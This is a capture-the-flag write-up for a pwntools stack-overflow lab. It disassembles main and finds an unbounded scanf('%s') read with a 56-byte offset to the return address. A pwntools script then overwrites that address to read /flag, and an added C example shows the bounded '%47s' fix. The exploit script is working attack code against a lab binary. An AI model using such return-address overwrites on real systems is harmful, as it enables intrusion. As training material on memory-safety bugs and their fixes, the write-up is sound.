pwntools-level-4.0

Sangharsha

Objective:

In this level, without the aid of source code, use cyclic patterns and core dump analysis to automatically find the return address and exploit a stack overflow to read the /flag file.

Solution:

After analyzing the given file pwntools-tutorials-level4.0 with strings and gdb, I found there is a buffer overflow.

disas main
Dump of assembler code for function main:
   0x0000000000401f84 <+0>:     endbr64
   0x0000000000401f88 <+4>:     push   %rbp
   0x0000000000401f89 <+5>:     mov    %rsp,%rbp
   0x0000000000401f8c <+8>:     sub    $0x30,%rsp
   0x0000000000401f90 <+12>:    movw   $0x1234,-0x2(%rbp)
   0x0000000000401f96 <+18>:    mov    $0xdeadbeef,%eax
   0x0000000000401f9b <+23>:    mov    %rax,-0x10(%rbp)
   0x0000000000401f9f <+27>:    mov    $0x0,%eax
   0x0000000000401fa4 <+32>:    call   0x401eaa <init>
   0x0000000000401fa9 <+37>:    mov    $0x0,%eax
   0x0000000000401fae <+42>:    call   0x401d9f <print_desc>
   0x0000000000401fb3 <+47>:    lea    0x1221(%rip),%rdi        # 0x4031db
   0x0000000000401fba <+54>:    call   0x4011d0 <puts@plt>
   0x0000000000401fbf <+59>:    lea    -0x30(%rbp),%rax
   0x0000000000401fc3 <+63>:    mov    %rax,%rsi
   0x0000000000401fc6 <+66>:    lea    0x1221(%rip),%rdi        # 0x4031ee
   0x0000000000401fcd <+73>:    mov    $0x0,%eax
   0x0000000000401fd2 <+78>:    call   0x4012b0 <__isoc99_scanf@plt>
   0x0000000000401fd7 <+83>:    mov    $0x0,%eax
   0x0000000000401fdc <+88>:    call   0x401c57 <print_exit>
   0x0000000000401fe1 <+93>:    mov    $0x0,%eax
   0x0000000000401fe6 <+98>:    leave
   0x0000000000401fe7 <+99>:    ret
End of assembler dump.
0x401fbf <+59>: lea    -0x30(%rbp), %rax   # address of the input buffer
0x401fc3 <+63>: mov    %rax, %rsi           # scanf destination argument
0x401fc6 <+66>: lea    0x1221(%rip), %rdi   # format string "%s"
0x401fcd <+73>: mov    $0x0, %eax
0x401fd2 <+78>: call   __isoc99_scanf@plt   # unbounded scanf("%s"): this is our target
  • The stack frame allocates 0x30 bytes (sub $0x30, %rsp).

  • Input lands at lea -0x30(%rbp), %rax, i.e. at the bottom of the frame, and is read with scanf("%s", rax): a classic unbounded string read.

  • There is no bounds checking at all. scanf("%s", ...) keeps writing until it hits whitespace, so anything longer than the frame runs over the saved rbp and the return address.

To find the right length for the cyclic pattern we need the distance between the start of the input buffer and the saved return address (rip):

rbp + 8       # saved return address (rip)
rbp - 0x30    # start of the input buffer

So the distance is:

Offset to RIP: 0x30 + 8 = 56 bytes.
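The following is an added example, not code from the original writeup or from the challenge binary. It puts the unbounded scanf("%s") shape from the disassembly next to a bounded version, and checks the 0x30 + 8 = 56 arithmetic with a struct that mirrors the frame layout (48 bytes of locals, saved rbp, return address). The 48-byte BUF_SIZE, the struct frame, and the function names are assumptions made for this example; the real binary keeps other locals inside the same 0x30 region, but the distance to the return address is the same.

```c
#include <stdio.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumption for this example: the 0x30 (48) bytes between the scanf
 * destination (rbp-0x30) and the saved rbp are treated as one buffer. */
#define BUF_SIZE 48

/* Frame layout as the disassembly shows it: 48 bytes of locals, then the
 * saved rbp pushed by the prologue, then the return address. */
struct frame {
    char     buf[BUF_SIZE];
    uint64_t saved_rbp;
    uint64_t ret;
};

/* Distance from the start of the input buffer to the return address. */
size_t frame_ret_offset(void) {
    return offsetof(struct frame, ret);   /* 0x30 + 8 = 56 */
}

/* Vulnerable shape from the disassembly: "%s" carries no field width, so
 * scanf keeps writing past buf until it meets whitespace. Not called here. */
void read_unbounded(char buf[BUF_SIZE]) {
    scanf("%s", buf);
}

/* Hardened shape: a field width of BUF_SIZE-1 caps the copy and leaves room
 * for the terminator. sscanf stands in for scanf so the input can be a
 * constructed string instead of stdin. Returns the stored length, or -1 if
 * nothing matched. */
#define STR_(x) #x
#define STR(x) STR_(x)
#define MAX_CHARS 47   /* BUF_SIZE - 1 */

int read_bounded(const char *input, char buf[BUF_SIZE]) {
    if (sscanf(input, "%" STR(MAX_CHARS) "s", buf) != 1) {
        buf[0] = '\0';
        return -1;
    }
    return (int)strlen(buf);
}

/* Feed n bytes of 'A' (constructed input) through read_bounded and report
 * how many were stored: never more than MAX_CHARS, so the write can never
 * reach frame_ret_offset(). */
int bounded_read_len(size_t n) {
    char input[512];
    char buf[BUF_SIZE];
    if (n >= sizeof input) n = sizeof input - 1;
    memset(input, 'A', n);
    input[n] = '\0';
    return read_bounded(input, buf);
}

int main(void) {
    printf("offset to return address: %zu\n", frame_ret_offset());
    printf("stored from 200-byte input: %d\n", bounded_read_len(200));
    printf("stored from 5-byte input:   %d\n", bounded_read_len(5));
    return 0;
}
```

The field width is the whole fix: with "%47s" a 200-byte line is cut at 47 characters and the saved rbp and return slot at offsets 48 and 56 are never touched, while the page's "%s" would write all 200 bytes.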

Solution Code:

from pwn import *

# Load the challenge binary so context (arch, endianness) matches it
context.binary = '/challenge/pwntools-tutorials-level4.0'
elf = context.binary
p = process(elf.path)

# 0x30 bytes of frame + 8 bytes of saved rbp = 56 bytes to the return address
offset = 56
# Return address used in this writeup (0x401f0f)
payload = b'A' * offset + p64(0x401f0f)

# Send the payload once the program asks for input, then hand over the shell
p.sendlineafter(b"Give me your input", payload)
p.interactive()

Flag:
